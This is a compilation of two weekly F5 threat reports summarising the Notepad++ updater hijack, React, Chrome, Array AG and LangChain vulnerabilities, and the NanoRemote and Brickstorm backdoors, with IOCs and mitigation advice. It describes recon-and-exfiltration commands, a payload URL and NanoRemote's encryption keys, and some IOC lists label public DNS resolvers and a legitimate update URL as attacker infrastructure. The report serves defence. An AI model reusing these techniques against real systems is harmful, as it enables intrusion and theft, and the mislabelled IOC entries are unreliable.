F5 Threat Report - December 17th, 2025
Notepad++ Fixes Flaw That Let Attackers Push Malicious Update Files Notepad++ version 8.8.9 was released to address a security vulnerability in its WinGUp update tool, which had been exploited to deliver malicious executables instead of legitimate software updates. Reports indicated that the GUP.exe updater spawned an unauthorized "%Temp%\AutoUpdater.exe" process, which executed reconnaissance commands such as `netstat -ano`, `systeminfo`, `tasklist`, and `whoami`, subsequently exfiltrating the collected data in `a.txt` to `temp[.]sh` using `curl.exe`. To mitigate this, Notepad++ developer Don Ho initially released version 8.8.8 on November 18th, restricting updates to GitHub. A more robust fix arrived with version 8.8.9 on December 9th, which hardens the update process by verifying the digital signature and certificate of downloaded installers, aborting any update that fails this validation. Security expert Kevin Beaumont also noted three organizations experiencing security incidents linked to Notepad++ processes spawning initial access, suggesting potential hijacking of the update URL (`https://notepad-plus-plus.org/update/getDownloadUrl.php`) to redirect users to malicious downloads. Users are advised to upgrade to version 8.8.9 and remove any custom root certificates installed prior to v8.8.7, as all official binaries are now signed. Severity: Critical Sources https://buaq.net/go-380719.html https://gbhackers.com/notepad-flaw-attackers-hijack-update-traffic/ https://malwaretips.com/threads/notepad-updater-installed-malware.138657/ https://securityonline.info/urgent-patch-notepad-wingup-flaw-allowed-malware-to-hijack-updates/ https://www.bleepingcomputer.com/news/security/notepad-plus-plus-fixes-flaw-that-let-attackers-push-malicious-update-files/ https://www.hendryadrian.com/notepad-fixes-flaw-that-let-attackers-push-malicious-update-files/ https://www.securitylab.ru/news/567129.php Threat Details and IOCs Technologies: Microsoft Windows, Notepad++ Threat Actors: FatBeehive Attacker Countries: China Attacker Domains: temp.sh Attacker URLs: https://notepad-plus-plus.org/update/getDownloadUrl.php Victim Industries: Critical Manufacturing, Financial, Financial Services, Government, Healthcare, Information Technology, Manufacturing, Software, Telecommunications Victim Countries: Afghanistan, Bangladesh, Bhutan, China, India, Japan, Maldives, Mongolia, Nepal, North Korea, Pakistan, South Korea, Sri Lanka, Taiwan Mitigation Advice Identify all assets with Notepad++ installed and upgrade them to version 8.8.9 or newer. Using an EDR or endpoint management tool, scan all endpoints for the existence of the file `AutoUpdater.exe` in any `%Temp%` directory. Query endpoint and command-line logs for the execution of reconnaissance commands (`netstat`, `systeminfo`, `tasklist`, `whoami`) that redirect output to a file named `a.txt`. Add the domain `temp.sh` to your network blocklist on your firewall, DNS sinkhole, and web proxy. Audit user and system certificate stores for any custom root certificates related to older Notepad++ installations and remove them. Compliance Best Practices Implement a software asset management (SAM) program to maintain a real-time inventory of all applications and versions installed on company assets to ensure timely patching. Develop and deploy an application control policy that prevents the execution of programs from user-writable directories such as `%Temp%`. Configure your EDR to generate alerts when common software updater processes spawn command shells (like cmd.exe or powershell.exe) to execute discovery commands. Implement a network egress filtering policy that denies outbound traffic by default and explicitly allows only traffic required for business operations. Incorporate modules into your security awareness training program that teach users how to verify official software download sources and recognize the risks of installing software from advertisements or untrusted websites. Denial of Service and Source Code Exposure in React Server Components Two new vulnerabilities have been identified in React Server Components, necessitating immediate upgrades for affected applications. These include a High Severity Denial of Service (CVE-2025-55184 and CVE-2025-67779, CVSS 7.5) and a Medium Severity Source Code Exposure (CVE-2025-55183, CVSS 5.3). The Denial of Service vulnerability allows a malicious HTTP request to trigger an infinite loop, consuming CPU and hanging the server process, even if an application does not implement React Server Function endpoints but supports React Server Components. The Source Code Exposure vulnerability enables an attacker to retrieve the source code of a Server Function if it explicitly or implicitly stringifies an argument, potentially leaking hardcoded secrets, though runtime secrets are unaffected. These vulnerabilities impact `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.0.1, 19.0.2, 19.1.0, 19.1.1, 19.1.2, 19.2.0, 19.2.1, and 19.2.2. Fixes have been backported to versions 19.0.3, 19.1.4, and 19.2.3, and all users are strongly advised to upgrade to these patched versions. Affected frameworks and bundlers include next, react-router, waku, @parcel/rsc, @vite/rsc-plugin, and rwsdk. Applications not using a server or not utilizing a framework/bundler that supports React Server Components are not affected. Severity: Critical Sources https://buaq.net/go-381099.html https://cyberpress.org/react-server-components-flaws-enable-dos-attacks-and-source-code-exposure/ https://gbhackers.com/severe-flaws-in-react-server-components-enable-dos-attacks/ https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components https://securityonline.info/react-patches-two-new-flaws-risking-server-crashing-dos-and-source-code-disclosure/ https://thehackernews.com/2025/12/new-react-rsc-vulnerabilities-enable.html Threat Details and IOCs Malware: Agent Tesla, AISURU, ANGRYREBEL, AshTag, BEACON, BPFDoor, BRICKSTORM, Cobalt Strike, EtherRAT, Noodle RAT, Nood RAT, Predator, Sliver, ValleyRAT, Winos CVEs: CVE-2025-55182, CVE-2025-55183, CVE-2025-55184, CVE-2025-67779 Technologies: Meta React Server Components, Node.js, Parcel, React, React Router, Vercel Next.js, Vercel Turbopack, Vite, Waku, Webpack Threat Actors: Calypso, Earth Bluecrow, Earth Lamia, EarthLamia, Iron Tiger, Jackpot Panda, JackpotPanda, Lazarus Group, Red Menshen, RedMenshen, Rocke, UNC5342 Attacker Countries: China, North Korea Attacker IPs: 78.153.140.16 Attacker URLs: 78.153.140.16/re.sh Victim Industries: Business Services, E-commerce, Education, Financial Services, Gaming, Government, Healthcare, Legal and Professional Services, Logistics, Manufacturing, Multimedia, Retail, Software, Technology Hardware, Telecommunications, Web Hosting Victim Countries: Australia, Canada, China, France, Germany, Hong Kong, India, Singapore, United Kingdom, United States Mitigation Advice Scan all code repositories to identify applications using React Server Components, specifically looking for the vulnerable packages: `react-server-dom-webpack`, `react-server-dom-parcel`, `react-server-dom-turbopack`, or affected frameworks like `next` and `react-router`. For any application identified as using a vulnerable version of `react-server-dom-webpack`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3. For any application identified as using a vulnerable version of `react-server-dom-parcel`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3. For any application identified as using a vulnerable version of `react-server-dom-turbopack`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3. For applications using affected frameworks like Next.js or react-router, upgrade the framework to a version that incorporates the patched React Server Component packages. Compliance Best Practices Implement a centralized secrets management solution, such as HashiCorp Vault or a cloud-native option like AWS Secrets Manager or Azure Key Vault, to store and manage all application secrets instead of hardcoding them in source files. Integrate static application security testing (SAST) tools into the CI/CD pipeline to automatically scan for and block any code commits that contain hardcoded secrets. Configure and tune the Web Application Firewall (WAF) with rate-limiting rules to detect and block anomalous or high-volume requests targeting application endpoints, which can help mitigate denial-of-service attacks. Review and formalize the third-party software patch management policy to ensure critical vulnerabilities are identified and remediated within a defined timeframe, including subscribing to security advisories for all critical libraries and frameworks. NanoRemote: Advanced Windows Backdoor Leveraging Google Drive API for Stealthy C2 NanoRemote is a sophisticated Windows backdoor, first identified in October 2025 by Elastic Security Labs, that leverages the Google Drive API for stealthy command-and-control (C2) and file staging, allowing its malicious traffic to blend with legitimate cloud operations. This C++ implant, associated with the espionage-linked REF7707 threat cluster (also known as CL‑STA‑0049, Earth Alux, Jewelbug), targets government, telecom, aviation, and education sectors, demonstrating an evolution from previous implants like FINALDRAFT which used the Microsoft Graph API. The attack chain typically involves WMLOADER, a loader masquerading as Bitdefender Security’s BDReinit.exe with an invalid signature, which decrypts and executes the NanoRemote payload from `wmsetup.log` using a rolling XOR routine followed by AES-CBC decryption with a key of `3A5AD78097D944AC`. NanoRemote itself communicates via HTTP POST, sending Zlib-compressed, AES-CBC encrypted JSON data to a non-routable IP at `/api/client` with the User-Agent `NanoRemote/1.0`, utilizing a hard-coded AES-CBC key of `558bec83ec40535657833d7440001c00` and Google Drive API OAuth 2.0 tokens for authentication. Its 22 command handlers enable extensive capabilities including system enumeration, file system operations, custom PE loader execution, remote command execution, and Google Drive download/upload tasks, further enhanced by `libPeConv` and Microsoft Detours for stealth. Detection is complicated by its cloud API abuse, necessitating behavioral detection rules, YARA rules for artifacts like `wmsetup.log`, and adherence to MITRE ATT&CK mappings (Exfiltration over Web Service, Masquerading, Discovery, Command Execution, Defence Evasion). Immediate incident response includes isolating infected machines, rotating Google API credentials, forensic analysis, auditing API logs for atypical Google Drive activity, and blocking known C2 IPs, while long-term remediation focuses on Zero-Trust principles, cloud API monitoring, and SIEM/UEBA integration. Severity: Critical Sources https://buaq.net/go-381078.html https://cyberpress.org/nanoremote-malware/ https://cybersrcc.com/2025/12/11/nanoremote-advanced-windows-backdoor-leveraging-google-drive-api-for-stealthy-c2/ https://malwaretips.com/threads/meet-nanoremote-a-newly-discovered-windows-backdoor-that-leverages-the-google-drive-api-for-data-theft-and-payload-staging.138663/ https://thehackernews.com/2025/12/nanoremote-malware-uses-google-drive.html https://www.hendryadrian.com/nanoremote-cousin-of-finaldraft/ Threat Details and IOCs Malware: FINALDRAFT, NanoRemote, NANOREMOTE, Squidoor, WMLOADER Technologies: Bitdefender, Google Drive, Microsoft Graph, Microsoft Windows, Trend Micro Threat Actors: CLSTA0049, EarthAlux, Finaldraft, Jewelbug, REF7707 Attacker Countries: China Attacker URLs: /api/client, /drive/v3/files/%s?alt=media, /upload/drive/v3/files Attacker Hashes: 1e28c01387e0f0229a3fb3df931eaf80, 35593a51ecc14e68181b2de8f82dde8c18f27f16fcebedbbdac78371ff4f8d41, 558bec83ec40535657833d7440001c00, 57e0e560801687a8691c704f79da0c1dbdd0f7d5cc671a6ce07ec0040205d728, 999648bd814ea5b1e97918366c6bd0f82b88f5675da1d4133257b9e6f4121475, b26927ca4342a19e9314cf05ee9d9a4bddf7b848def2db941dd281d692eaa73c, fff31726d253458f2c29233d37ee4caf43c5252f58df76c0dced71c4014d6902 Victim Industries: Aerospace, Defense, Education, Financial Services, Government, Healthcare, Information Technology, Logistics, Manufacturing, Retail, Software, Technology Hardware, Telecommunications Victim Countries: Argentina, Bolivia, Brazil, Brunei, Cambodia, Chile, Colombia, Ecuador, Guyana, Indonesia, Laos, Malaysia, Myanmar, Paraguay, Peru, Philippines, Russia, Singapore, Suriname, Taiwan, Thailand, Timor-Leste, Uruguay, Venezuela, Vietnam Mitigation Advice Scan all Windows endpoints for the presence of files named 'wmsetup.log' and executables named 'BDReinit.exe' that have an invalid or missing digital signature. Search all available network logs (e.g., proxy, firewall, DNS) for outbound HTTP requests containing the User-Agent string 'NanoRemote/1.0'. Obtain and deploy the publicly available YARA rules for NanoRemote and WMLOADER into your endpoint detection and response (EDR) or other file scanning solutions. Use an EDR or endpoint management tool to query all Windows systems for the existence of the environment variable 'NR_GOOGLE_ACCOUNTS'. Create a SIEM or network intrusion detection system (NIDS) rule to alert on HTTP POST requests to any URI ending in '/api/client' that also originate from a process with the User-Agent 'NanoRemote/1.0'. If a compromise is suspected or confirmed, immediately review and revoke suspicious Google Workspace OAuth tokens and rotate API credentials for the affected accounts. Compliance Best Practices Implement a Cloud Access Security Broker (CASB) to gain visibility into Google Drive API usage and establish policies to detect and alert on anomalous activity, such as unusually frequent uploads or downloads by a service account. Establish a data pipeline to ingest Google Workspace audit logs, specifically including Google Drive API activity, into your SIEM for centralized analysis and alerting. Initiate a recurring audit of all Google Workspace OAuth applications and service account permissions, revoking unnecessary or overly permissive API access based on the principle of least privilege. Refine and tune your Endpoint Detection and Response (EDR) platform's behavioral rules to generate high-fidelity alerts for suspicious memory allocation (VirtualAlloc) followed by execution, especially from non-standard processes. Implement application control policies on endpoints to restrict which executables are permitted to make outbound connections to known cloud service domains like 'googleapis.com'. New ConsentFix Attack Hijacks Microsoft Accounts via Azure CLI A novel ConsentFix attack, a variant of the ClickFix social engineering technique, has been identified that exploits the Azure CLI OAuth app to compromise Microsoft accounts, circumventing both password requirements and multi-factor authentication (MFA). This method, discovered by Push Security, initiates when a victim navigates to a compromised, high-ranking website displaying a deceptive Cloudflare Turnstile CAPTCHA that requests a business email. Upon validation against a target list, the victim is prompted to click a "Sign in" button, which directs them to a legitimate Microsoft Azure CLI login page. Following successful authentication or account selection, Microsoft redirects the user to a localhost URL containing an Azure CLI OAuth authorization code. The attacker then instructs the victim to paste this URL back into the malicious site, thereby granting the attacker full control over the Microsoft account via the Azure CLI OAuth app without ever acquiring the user's credentials or bypassing MFA directly. The attack is designed to trigger only once per victim IP address. To mitigate this threat, organizations should monitor for anomalous Azure CLI login activity, particularly from new IP addresses, and scrutinize the use of legacy Graph scopes. Detection can be further enhanced through Microsoft Defender for Cloud Apps' "Malicious OAuth app consent" policies, Azure AD Identity Protection's consent phishing and workload identity risk detections, and by actively monitoring AADGraphActivityLogs for unusual activity. Severity: Critical Sources https://cyberpress.org/consentfix-attack/ https://www.bleepingcomputer.com/news/security/new-consentfix-attack-hijacks-microsoft-accounts-via-azure-cli/ Threat Details and IOCs Malware: CyberVolk 2.x, NANOREMOTE, VolkLocker Technologies: Microsoft 365, Microsoft Azure, Microsoft Azure CLI, Microsoft Entra ID, Microsoft Intune Attacker IPs: 12.75.116.137, 12.75.216.90, 182.3.36.223 Attacker Domains: fastwaycheck.com, previewcentral.com, trustpointassurance.com Attacker URLs: hxxps://fastwaycheck.com/, hxxps://previewcentral.com, hxxps://trustpointassurance.com/ Victim Industries: Aerospace, Government, Healthcare, Non-Governmental Organizations (NGOs), Retail, Supply Chain Victim Countries: United States Mitigation Advice Review Azure AD sign-in logs for unusual Azure CLI login activity, focusing on logins from unexpected IP addresses, geolocations, or by users who do not typically use the Azure CLI. Create detection rules in your SIEM to alert on the use of legacy Azure AD Graph API scopes within OAuth consent grants, as this is a known attacker technique to evade detection. Send an immediate security bulletin to all employees warning them to never copy and paste a full URL from their browser's address bar into a website form, especially if the URL contains 'localhost' or authentication codes. Compliance Best Practices Implement a recurring process to audit all OAuth applications in Azure AD, reviewing their permissions, usage, and business justification, and remove any unnecessary or overly permissive applications. Deploy and configure Microsoft Defender for Cloud Apps, enabling specific policies like 'Malicious OAuth app consent' to automatically detect and alert on suspicious OAuth application activity. Enable and monitor detections within Azure AD Identity Protection, specifically focusing on 'Consent Phishing' and 'workload identity risk' alerts, and create automated response actions for high-severity findings. Develop and enforce a policy based on the principle of least privilege to restrict Azure CLI access to only authorized administrative and developer roles. Establish a continuous security awareness training program that includes modules on identifying and responding to sophisticated phishing and consent grant attacks. Google Patches Chrome Zero-Day Vulnerability Exploited in Attack Google has released urgent updates for Chrome to address a newly patched zero-day vulnerability, tracked as 466192044, which is actively being exploited in the wild. This marks the eighth such security flaw fixed this year, following CVE-2025-13223, CVE-2025-10585, CVE-2025-6558, CVE-2025-6554, CVE-2025-5419, CVE-2025-2783, and CVE-2025-4664. While specific details on 466192044 are limited due to ongoing coordination, Google confirmed its active exploitation. Additionally, the updates resolve CVE-2025-14372, a Use-After-Free vulnerability in the Password Manager, and CVE-2025-14373, an inappropriate implementation issue in the Toolbar. All Google Chrome versions prior to 143.0.7499.109 are affected, and users are advised to upgrade immediately to stable channel version 143.0.7499.109/.110 for Windows/Mac or 143.0.7499.109 for Linux to mitigate these risks. Severity: Critical Sources https://buaq.net/go-380989.html https://threatprotect.qualys.com/2025/12/11/google-patches-zero-day-vulnerability-exploited-in-attack/ https://www.techradar.com/pro/security/google-releases-emergency-fix-for-yet-another-zero-day Threat Details and IOCs CVEs: CVE-2025-14372, CVE-2025-14373 Technologies: Apple macOS, Google Chrome, Linux, Microsoft Edge, Microsoft Windows Threat Actors: DarkHotel, Lazarus, TaxOff, Team46 Victim Industries: Financial Services, Government, Healthcare, Technology Hardware Victim Countries: United States Mitigation Advice Update all Google Chrome installations on Windows and macOS to version 143.0.7499.109/.110 and on Linux to version 143.0.7499.109. Initiate a vulnerability scan using Qualys QID 386201 to identify all endpoints with vulnerable versions of Google Chrome. Compliance Best Practices Implement and configure an automated patch management solution to ensure security updates for all third-party software, especially web browsers, are deployed within 72 hours of release. Develop and enforce a security policy using Group Policy Objects (GPO) or a similar endpoint management tool to disable non-essential browser features, such as the built-in password manager, and enforce the use of a dedicated enterprise password management tool. Stay updated on emerging threats: sign up for the F5 Threat Report to receive the Weekly Threat Report in your inbox.F5 Threat Report - December 10th, 2025
JPCERT Confirms Active Command Injection Attacks on Array AG Gateways JPCERT/CC has confirmed active command injection attacks targeting Array Networks AG Series secure access gateways, exploiting a vulnerability in the DesktopDirect feature since August 2025. This flaw, which currently lacks a CVE identifier, affects ArrayOS versions 9.4.5.8 and earlier, allowing attackers to execute arbitrary commands and drop web shells, with observed attacks originating from the IP address 194.233.100[.]138. Array Networks released a fix on May 11, 2025, in ArrayOS version 9.4.5.9, and users are advised to apply this update promptly; alternatively, disabling DesktopDirect services or implementing URL filtering to deny access to URLs containing semicolons can serve as mitigation. While a separate authentication bypass flaw (CVE-2023-28461) in the same product was previously exploited by the China-linked MirrorFace group, there is no current evidence connecting them to these latest command injection incidents. Severity: High Sources https://buaq.net/go-379737.html https://cyberpress.org/arrayos-ag-vpn-vulnerability/ https://gbhackers.com/arrayos-ag-vpn/ https://thecyberexpress.com/cve-2023-28461-jpcert-array-gateway-warning/ https://thehackernews.com/2025/12/jpcert-confirms-active-command.html https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-arrayos-ag-vpn-flaw-to-plant-webshells/ Threat Details and IOCs Malware: Agenda, Albiriox, PoisonPlug, Qilin, Sha1-Hulud, ShadowPad, Shai-Hulud CVEs: CVE-2023-28461 Technologies: Array Networks AG Series, Array Networks ArrayOS, Array Networks vxAG, PHP Threat Actors: APT10, EarthKasha, MirrorFace Attacker Countries: China Attacker IPs: 194.233.100.138 Victim Industries: Aerospace, Defense, E-commerce, Education, Energy, Financial Services, Government, Healthcare, Information and Communication, Manufacturing, Multimedia, Public Sector, Semiconductors, Technology Hardware, Telecommunications, Utilities Victim Countries: China, India, Japan, Taiwan, United States Mitigation Advice Update all Array Networks AG Series gateways to ArrayOS version 9.4.5.9 or a later version to remediate the command injection vulnerability. If patching Array AG gateways to version 9.4.5.9 is not immediately feasible, disable the 'DesktopDirect' feature on all vulnerable devices. Configure your perimeter firewall or Web Application Firewall (WAF) to block all inbound HTTP/HTTPS requests to Array AG gateways that contain a semicolon character (';') in the URL. Add the IP address 194.233.100.138 to your network firewall's blocklist to deny all inbound and outbound traffic. Scan the file systems of all Array AG gateways for indicators of compromise, such as recently created or modified web shell files (e.g., .php, .asp) in web-accessible directories. Compliance Best Practices Establish a formal patch management policy that mandates regular vulnerability scanning of all internet-facing systems and defines strict service-level agreements (SLAs) for applying critical security patches. Implement a recurring configuration review process for all network security appliances to identify and disable any non-essential features and services, thereby minimizing the device's attack surface. Design and implement a DMZ network segment for all internet-facing services, including secure access gateways, and enforce strict firewall rules that only permit essential, pre-approved traffic between the DMZ and the internal corporate network. Configure all internet-facing appliances to forward detailed system, process, and network logs to a centralized SIEM, and develop detection rules to alert on anomalous file creation, command execution, and unusual outbound connections. LangChain Prompt Template Injection Vulnerability: Property Access (CVE-2025-65106) A prompt template injection vulnerability has been discovered in the LangChain `langchain-core` package, affecting versions up to `1.0.6` and `0.3.79`, with fixes implemented in versions `1.0.7` and `0.3.80`. Identified as CVE-2025-65106 and GHSA-6qv9-48xg-fc7f, this vulnerability allows attackers who can control template strings—rather than just template variables—to access Python object attributes, internal properties, and sensitive information, potentially escalating to more severe attacks. The flaw impacts F-string, Mustache, and Jinja2 template formats, stemming from issues such as attribute access in F-strings, `getattr()` fallback in Mustache, and insufficient sandboxing in Jinja2. Applications are at high risk if they accept untrusted template strings, dynamically construct prompts based on user input, or allow users to customize or create prompt templates. Remediation requires updating to the patched `langchain-core` versions, auditing code for any template strings originating from untrusted sources, and ensuring a clear separation between template structure and user-provided data. Specific fixes include F-string validation to restrict variable names to simple Python identifiers, strict type checking for Mustache to limit object traversal to dict, list, and tuple types, and the introduction of a `_RestrictedSandboxedEnvironment` for Jinja2 to block all attribute and method access. Severity: High Sources https://buaq.net/go-379721.html Threat Details and IOCs CVEs: CVE-2025-65106 Technologies: Jinja2, LangChain LangGraph, Python Victim Industries: E-commerce, Financial Services, Healthcare, Legal Services, Retail, Software Mitigation Advice Update all instances of the `langchain-core` Python package to version 1.0.7 or 0.3.80 or newer to patch the template injection vulnerability (GHSA-6qv9-48xg-fc7f). Audit your codebase to identify all applications using LangChain's `ChatPromptTemplate`. Prioritize remediation for any applications found to accept template strings from untrusted sources. Compliance Best Practices Enforce a secure coding standard for all AI/LLM applications that strictly separates the prompt template structure from user-provided data. Ensure that user input can only populate predefined variables within a static, developer-controlled template. During application design and code reviews, challenge the necessity of using string-based prompt templating. Where possible, refactor applications to use direct message objects (e.g., `HumanMessage`, `AIMessage`) to eliminate the risk of template injection vulnerabilities. Create a development policy that restricts the use of the Jinja2 template format (`template_format="jinja2"`) in LangChain to only those instances where the template content is hardcoded or originates from a fully trusted, internally-controlled source. Chinese State-Sponsored Actors Deploy Brickstorm Backdoor in US Critical Networks for Years Chinese state-sponsored actors, identified as UNC5221 by Mandiant and Warp Panda by CrowdStrike, have maintained long-term access, sometimes for years, within critical US networks, including at least eight government services and IT organizations, and dozens of other entities across legal, SaaS, business process outsourcing, technology, and manufacturing sectors. These groups deployed the sophisticated, cross-platform Brickstorm backdoor, which operates across Linux, VMware, and Windows environments, alongside new Go-based implants named Junction (for VMware ESXi, listening on port 8090) and GuestConduit (for guest VMs, using VSOCK on port 5555). Initial access was often gained by exploiting internet-facing edge devices, followed by pivoting to vCenter environments using valid credentials or vulnerabilities. Once inside, the adversaries stole cryptographic keys from domain controllers and Active Directory Federation Services servers, accessed and exfiltrated sensitive data from Microsoft Azure environments (OneDrive, SharePoint, Exchange), and established persistence by registering new multi-factor authentication devices. Warnings from CISA, NSA, and the Canadian Cyber Security Centre, along with reports from Google Threat Intelligence (Mandiant) and CrowdStrike, highlight the ongoing threat and the actors' evolving techniques, with Palo Alto Networks' Unit 42 also monitoring the activity. Severity: Critical Sources https://cyberpress.org/china-nexus-hackers/ https://federalnewsnetwork.com/cybersecurity/2025/12/agencies-it-companies-impacted-by-latest-malware-from-china/ https://gbhackers.com/vmware-vcenter-systems/ https://industrialcyber.co/cisa/cisa-nsa-sound-alarm-on-brickstorm-backdoor-used-by-china-linked-actors-targeting-vmware-windows-systems/ https://securitybrief.asia/story/warp-panda-cyberespionage-group-targets-us-cloud-networks https://thecyberexpress.com/cisa-prc-hackers-target-vmware-with-brickstorm/ https://thehackernews.com/2025/12/cisa-reports-prc-hackers-using.html https://www.bleepingcomputer.com/news/security/cisa-warns-of-chinese-brickstorm-malware-attacks-on-vmware-servers/ https://www.cisa.gov/news-events/alerts/2025/12/04/prc-state-sponsored-actors-use-brickstorm-malware-across-public-sector-and-information-technology https://www.cisa.gov/news-events/analysis-reports/ar25-338a https://www.cisa.gov/news-events/news/cisa-nsa-and-cyber-centre-warn-critical-infrastructure-brickstorm-malware-used-peoples-republic https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/ https://www.darkreading.com/cyberattacks-data-breaches/cisa-ongoing-brickstorm-backdoor-attacks https://www.hendryadrian.com/cisa-warns-of-chinese-brickstorm-malware-attacks-on-vmware-servers/ https://www.infosecurity-magazine.com/news/chinalinked-warp-panda/ https://www.safebreach.com/blog/safebreach-coverage-for-updated-cisa-ar25-338a-brickstorm-backdoor/ https://www.securityweek.com/us-organizations-warned-of-chinese-malware-used-for-long-term-persistence/ https://www.theregister.com/2025/12/04/prc_spies_brickstrom_cisa/ Threat Details and IOCs Malware: BRICKSTEAL, BrickStorm, BRICKSTORM, GuestConduit, Junction, RESURGE, SPAWN, SPAWNANT, SPAWNCHIMERA, SPAWNMOLE, SPAWNSNAIL, ZIPLINE CVEs: CVE-2021-22005, CVE-2023-34048, CVE-2023-46747, CVE-2023-46805, CVE-2023-4966, CVE-2024-21887, CVE-2024-21893, CVE-2024-38812, CVE-2025-0282, CVE-2025-22457 Technologies: BSD, F5 BIG-IP, Ivanti Connect Secure, Ivanti Policy Secure, Linux, Microsoft 365, Microsoft Active Directory, Microsoft Azure, Microsoft Windows, Microsoft Windows Server, VMware ESXi, VMware vCenter Server, VMware vSphere Threat Actors: RedDev61, Unc5221, Uta0178, WarpPanda Attacker Countries: China Attacker IPs: 1.0.0.1, 1.1.1.1, 149.112.112.11, 149.112.112.112, 149.28.120.31, 208.83.233.14, 45.90.28.160, 45.90.30.160, 8.8.4.4, 8.8.8.8, 9.9.9.11, 9.9.9.9 Attacker URLs: https://1.0.0.1/dns-query, https://1.1.1.1/dns-query, https://149.112.112.112/dns-query, https://149.112.112.11/dns-query, https://45.90.28.160/dns-query, https://45.90.30.160/dns-query, https://8.8.4.4/dns-query, https://8.8.8.8/dns-query, https://9.9.9.11/dns-query, https://9.9.9.9/dns-query Attacker Hashes: 013211c56caaa697914b5b5871e4998d0298902e336e373ebb27b7db30917eaf, 0a4fa52803a389311a9ddc49b7b19138, 10d811029f6e5f58cd06143d6353d3b05bc06d0f, 18f895e24fe1181bb559215ff9cf6ce3, 22c15a32b69116a46eb5d0f2b228cc37cd1b5915a91ec8f38df79d3eed1da26b, 320a0b5d4900697e125cebb5ff03dee7368f8f087db1c1570b0b62f5a986d759, 39111508bfde89ce6e0fe6abe0365552, 39b3d8a8aedffc1b40820f205f6a4dc041cd37262880e5030b008175c45b0c46, 40992f53effc60f5e7edea632c48736ded9a2ca59fb4924eb6af0a078b74d557, 40db68331cb52dd3ffa0698144d1e6919779ff432e2e80c058e41f7b93cec042, 44a3d3f15ef75d9294345462e1b82272b0d11985, 4c52caf2e5f114103ed5f60c6add3aa26c741b07869bb66e3c25a1dc290d4a8bf87c42c336e8ac8ebf82d9a9b23eaa18c31f7051a5970a8fe1125a2da890340f, 57bd98dbb5a00e54f07ffacda1fea91451a0c0b532cd7d570e98ce2ff741c21d, 5e654776e9c419e11e6f93a452415a601bd9a2079710f1074608570e498a9af37b81bb57c98cb8bb626c5ee4b3e35757d3ae8c1c3717f28d9f3fe7a4cebe0608, 659205fa2cfa85e484c091cc2e85a7ec4e332b196e423b1f39bafdc8fca33e3db712bbe07afcc091ff26d9b4f641fa9a73f2a66dce9a0ced54ebeb8c2be82a7f, 65ebf5dfafb8972ffead44271436ec842517cfaaf3d1f1f1237a32d66e1d280943bd3a69f1d539a1b7aca6152e96b29bc822e1047e2243f6aec8959595560147, 73fe8b8fb4bd7776362fd356fdc189c93cf5d9f6724f6237d829024c10263fe5, 74b4c6f7c7cae07c6f8edf3f2fb1e9206d4f1f9734e8e4784b15d192eec8cd8a4f59078fc0c56dc4ad0856cdd792337b5c92ffd3d2240c8a287a776df4363bba, 79276523a6a507e3fa1b12b96e09b10a01c783a53d58b9ae7f5780a379431639a80165e81154522649b8e2098e86d1a310efffebe32faafc7b3bc093eec60a64, 82bf31e7d768e6d4d3bc7c8c8ef2b358, 88db1d63dbd18469136bf9980858eb5fc0d4e41902bf3e4a8e08d7b6896654ed, 8e29aeb3603ffe307b2d60f7401bd9978bebe8883235eb88052ebf6b9e04ce6bf35667480cedea5712c1e13e8c6dcfb34d5fde0ddca6ca31328de0152509bf8f, 8e4c88d00b6eb46229a1ed7001451320, 97001baaa379bcd83677dca7bc5b8048fdfaaddc, 9a0e1b7a5f7793a8a5a62748b7aa4786d35fc38de607fb3bb8583ea2f7974806, 9bf4c786ebd68c0181cfe3eb85d2fd202ed12c54, a02469742f7b0bc9a8ab5e26822b3fa8, a52e36a70b5e0307cbcaa5fd7c97882c, aaf5569c8e349c15028bc3fac09eb982efb06eabac955b705a6d447263658e38, b3b6a992540da96375e4781afd3052118ad97cfe60ccf004d732f76678f6820a, b91881cb1aa861138f2063ec130b2b01a8aaf0e3f04921e5cbfc61b09024bf12, bbe18d32bef66ccfa931468511e8ba55b32943e47a1df1e68bb5c8f8ae97a5bf991201858ae9632fa24df5f6c674b6cb260297a1c11889ca61bda68513f440ce, bfb3ffd46b21b2281374cd60bc756fe2dcc32486dcc156c9bd98f24101145454, c3549d4e5e39a11f609fc6fbf5cc1f2c0ec272b4, dbca28ad420408850a94d5c325183b28, de28546ec356c566cd8bca205101a733e9a4a22d, dfac2542a0ee65c474b91d3b352540a24f4e223f1b808b741cfe680263f0ee44, f639d9404c03af86ce452db5c5e0c528b81dc0d7, f7cda90174b806a34381d5043e89b23ba826abcc89f7abd520060a64475ed506, fb11c6caa4ea844942fe97f46d7eb42bc76911ab Victim Industries: Business Process Outsourcing, Critical Manufacturing, Facilities Services, Government, Information Technology, Legal Services, Manufacturing, Public Sector, Software as a Service (SaaS), Technology Hardware Victim Countries: Australia, Austria, Canada, Germany, Greece, Mexico, New Zealand, United Kingdom, United States Mitigation Advice Download and run the open-source Brickstorm scanner from Mandiant's GitHub repository on all Linux, VMware, and Windows environments, prioritizing vCenter servers. Scan VMware ESXi hosts for the 'Junction' implant and monitor for suspicious processes masquerading as legitimate VMware services. Scan guest VMs within your VMware environment for the 'GuestConduit' implant, paying close attention to unusual VSOCK listener activity. Immediately scan all internet-facing edge devices for vulnerabilities and apply all available security patches, prioritizing any devices with known exploits. Audit all Microsoft 365 and Azure AD accounts for any recently registered MFA devices and verify the legitimacy of each new registration with the account owner. Review Microsoft 365 audit logs for anomalous access patterns to OneDrive, SharePoint, and Exchange Online, specifically looking for session replay activity or access from unusual IP addresses or locations. Compliance Best Practices Implement network segmentation to create isolated security zones for critical assets like VMware vCenter servers, ESXi hosts, and Domain Controllers, restricting access from less secure network segments. Enforce the principle of least privilege for all accounts, especially service accounts and administrative accounts, ensuring they only have the minimum permissions necessary to perform their functions on systems like vCenter and Active Directory. Implement a default-deny egress filtering policy on the network firewall, allowing outbound traffic only for explicitly approved protocols, ports, and destinations to disrupt command-and-control communications. Enhance security logging for critical systems, including VMware vCenter, ESXi hosts, Domain Controllers, and ADFS servers. Forward these logs to a SIEM and develop correlation rules to detect lateral movement and credential access techniques. Strengthen MFA policies by requiring re-authentication for sensitive actions such as registering a new MFA device, and enforce 